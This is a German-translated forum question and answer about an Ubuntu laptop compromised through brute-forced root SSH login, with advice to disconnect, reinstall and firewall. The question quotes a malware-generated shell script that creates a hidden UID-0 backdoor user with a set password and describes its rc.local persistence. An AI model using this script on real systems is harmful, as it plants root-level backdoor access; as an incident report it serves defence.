Ich bin mir ziemlich sicher, dass mein Ubuntu 13.10-Laptop mit einer Art Malware infiziert ist.
Hin und wieder stelle ich fest, dass ein Prozess / lib / sshd (im Besitz von root) ausgeführt wird und viel CPU verbraucht. Es ist nicht der sshd-Server, auf dem / usr / sbin / sshd ausgeführt wird.
Die Binärdatei verfügt über die Berechtigungen --wxrw-rwt und generiert und erzeugt Skripte im Verzeichnis / lib. Eine aktuelle Version heißt 13959730401387633604 und führt die folgenden Aktionen aus
#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd
Der Benutzer gusr wurde von der Malware unabhängig erstellt, und dann hängt sich der chpasswd auf, während 100% der CPU verbraucht werden.
Bisher habe ich festgestellt, dass der Benutzer gusr zusätzlich zu den Dateien in / etc / hinzugefügt wurde.
/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid
Es scheint, als hätte die Malware Kopien all dieser Dateien mit dem Suffix "-" erstellt. Die vollständige Liste der von root geänderten / etc / -Dateien finden Sie hier .
Außerdem wurde die Datei / etc / hosts in this geändert .
Die Datei / lib / sshd fügt sich am Ende der Datei /etc/init.d/rc.local hinzu!
Ich habe den Benutzer entfernt, die Dateien entfernt, den verarbeiteten Baum gelöscht, meine Passwörter geändert und die öffentlichen ssh-Schlüssel entfernt.
Mir ist bewusst, dass ich im Grunde genommen geschraubt bin, und ich werde höchstwahrscheinlich das gesamte System neu installieren. Da ich mich jedoch bei mehreren anderen Computern anmelde, wäre es gut, zumindest zu versuchen, es zu entfernen und herauszufinden, wie ich es bekommen habe. Vorschläge, wie dies zu bewerkstelligen ist, sind willkommen.
Es scheint, als wären sie am 25. März durch brachiales Root-Login reingekommen. Ich hatte keine Ahnung, dass root ssh in Ubuntu standardmäßig aktiviert ist. Ich habe es deaktiviert und Denyhosts aufgestellt.
Der Login war von 59.188.247.236, anscheinend irgendwo in Hong Kong.
Ich habe den Laptop von EmperorLinux bekommen und sie haben den Root-Zugriff aktiviert. Wenn Sie eine davon haben und sshd ausführen, passen Sie auf.
Linux/Ebury. Es ist etwas anderes und hat möglicherweise keinen zugewiesenen Namen. Ebury würde kein neues Benutzerkonto erstellen und hätte die von openssh verwendete gemeinsam genutzte Bibliothek geändert und nicht in einer neuen Binärdatei mit dem Namen sshd abgelegt.Antworten:
Holen Sie sich zuerst die Maschine jetzt aus dem Netzwerk!
Zweitens, warum haben Sie das Root-Konto aktiviert? Sie sollten das Root-Konto nur aktivieren, wenn Sie einen guten Grund dafür haben.
Drittens ist eine Neuinstallation der einzige Weg, um sicherzugehen, dass Sie sauber sind. Es wird auch empfohlen, dass Sie neu beginnen und nicht auf ein Backup zurückgreifen, da Sie nie sicher sein können, wann alles begonnen hat.
Ich schlage außerdem vor, dass Sie bei Ihrer nächsten Installation eine Firewall einrichten und alle eingehenden Verbindungen ablehnen:
und dann erlaube ssh mit:
und NICHT das Root-Konto aktivieren! Stellen Sie sicher, dass das Root-SSH-Login deaktiviert ist.
quelle